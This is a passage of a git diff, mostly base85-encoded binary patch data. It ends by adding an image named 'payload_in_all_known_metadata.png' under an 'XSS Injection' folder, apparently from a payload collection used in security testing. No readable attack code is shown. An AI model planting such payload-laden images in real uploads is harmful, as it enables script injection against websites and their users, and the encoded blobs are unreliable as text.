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

literal 0
HcmV?d00001

diff --git a/XSS Injection/Files/payload_in_all_known_metadata.png b/XSS Injection/Files/payload_in_all_known_metadata.png
new file mode 100644
index 0000000000000000000000000000000000000000..fdd55e390fce7ac67c6f38cdd2b89434355ed7b3
GIT binary patch
literal 39710
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
